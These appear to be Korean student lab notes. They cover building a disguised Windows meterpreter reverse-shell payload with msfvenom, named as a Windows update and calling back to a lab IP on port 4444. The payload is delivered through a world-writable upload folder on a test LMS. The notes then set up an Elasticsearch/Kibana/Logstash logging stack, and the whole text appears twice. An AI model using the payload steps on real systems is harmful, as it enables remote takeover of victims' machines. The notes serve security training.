#20250114
-해커 메일 송신 정상화
> nano /etc/mail/access
> makemap hash /etc/mail/access < /etc/mail/access
> systemctl restart sendmail
-lms.st.kr 생성
kali에서 window로 들어갈 수 없으니 악성코드를 통해서 window 서버가 4444 포트로 나오게 유도.
교수님이 주신 lms.zip 파일 이용.
uploads 디렉터리 생성 > chmod 777 uploads
파일 업로드 기능 설정
form 태그의 속성에 enctype="" 속성이 꼭 들어가야 한다.
악성코드 생성
kali > msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=100.100.100.1 LPORT=4444 -b "\x00" -f exe > /home/kali/windows_update_20250114.exe
4444 포트오픈
> nc -l -p 4444
후 만들어진 windows_update_20250114.exe 파일을 업로드 하면 정상적으로 업로드 된 것을 확인할 수 있다.
window에서 파일이 정상적으로 다운받아진다.
다운로드 받은 파일을 실행하면
SELK
> netstat -ant | grep 5601
> netstat -ant | grep 9200
> nano /etc/elasticsearch/elasticsearch.yml
----Network----
#network.host: 192.168.0.1
주석 풀고 ip를 0.0.0.0으로 바꾸기
모든 호스트에서 접근가능하도록.
> systemctl start elasticsearch
(만약 오류나면 다시 elasticsearch.yml 파일 열어서
----Discovery----
discovery.seed_hosts
cluster.initial_master_nodes
두개 주석 풀기)
> curl -X GET "localhost:9200"
> systemctl enable elasticsearch
kibana
> netstat -ant | grep 5601
> nano /etc/nginx/sites-available/default
server{ } 안에 있는 모든 내용 주석처리 후 listen 80; 부터 새로 작성.
server {
listen 80;
server_name _;
location / {
proxy_pass http://localhost:5601;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
systemctl reload nginx
systemctl restart nginx
systemctl enable nginx
systemctl start kibana
systemctl enable kibana
reboot
----
/var/log/apache2에 있는 access.log를 /backup으로 가져오기
win7에서 access.log 빼오기 (바탕화면 - log_www 폴더)
10.0.2.3 웹 > upload file > Visualize data from a log file에 access.log 파일 올리기
> Import > www_access_log > Import > View Index in discover
----
메인서버
curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install filebeat
sudo apt -y install packetbeat
nano /etc/filebeat/filebeat.yml
SELK > systemctl start logstash (enable 하지 말기)
> netstat -ant | grep 5044
> cd /etc/logstash/conf.d
> nano input.conf
input{
beats{
port=>5044
}
}
> systemctl restart logstash
> nano output.conf
output {
}
> sudo -u logstash /usr/share/logstash/bin/logstash --path.settings /etc/logstash -t
> netstat -ant | grep 5044
포트 열림.
> nano /etc/mail/access
> makemap hash /etc/mail/access < /etc/mail/access
> systemctl restart sendmail
-lms.st.kr 생성
kali에서 window로 들어갈 수 없으니 악성코드를 통해서 window 서버가 4444 포트로 나오게 유도.
교수님이 주신 lms.zip 파일 이용.
uploads 디렉터리 생성 > chmod 777 uploads
파일 업로드 기능 설정
form 태그의 속성에 enctype="" 속성이 꼭 들어가야 한다.
악성코드 생성
kali > msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=100.100.100.1 LPORT=4444 -b "\x00" -f exe > /home/kali/windows_update_20250114.exe
4444 포트오픈
> nc -l -p 4444
후 만들어진 windows_update_20250114.exe 파일을 업로드 하면 정상적으로 업로드 된 것을 확인할 수 있다.
window에서 파일이 정상적으로 다운받아진다.
다운로드 받은 파일을 실행하면
SELK
> netstat -ant | grep 5601
> netstat -ant | grep 9200
> nano /etc/elasticsearch/elasticsearch.yml
----Network----
#network.host: 192.168.0.1
주석 풀고 ip를 0.0.0.0으로 바꾸기
모든 호스트에서 접근가능하도록.
> systemctl start elasticsearch
(만약 오류나면 다시 elasticsearch.yml 파일 열어서
----Discovery----
discovery.seed_hosts
cluster.initial_master_nodes
두개 주석 풀기)
> curl -X GET "localhost:9200"
> systemctl enable elasticsearch
kibana
> netstat -ant | grep 5601
> nano /etc/nginx/sites-available/default
server{ } 안에 있는 모든 내용 주석처리 후 listen 80; 부터 새로 작성.
server {
listen 80;
server_name _;
location / {
proxy_pass http://localhost:5601;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
systemctl reload nginxsystemctl restart nginx
systemctl enable nginx
systemctl start kibana
systemctl enable kibana
reboot
----
/var/log/apache2에 있는 access.log를 /backup으로 가져오기
win7에서 access.log 빼오기 (바탕화면 - log_www 폴더)
10.0.2.3 웹 > upload file > Visualize data from a log file에 access.log 파일 올리기
> Import > www_access_log > Import > View Index in discover
----
메인서버
curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install filebeat
sudo apt -y install packetbeat
nano /etc/filebeat/filebeat.yml
SELK > systemctl start logstash (enable 하지 말기)
> netstat -ant | grep 5044
> cd /etc/logstash/conf.d
> nano input.conf
input{
beats{
port=>5044
}
}
> systemctl restart logstash
> nano output.conf
output {
}
> sudo -u logstash /usr/share/logstash/bin/logstash --path.settings /etc/logstash -t
> netstat -ant | grep 5044
포트 열림.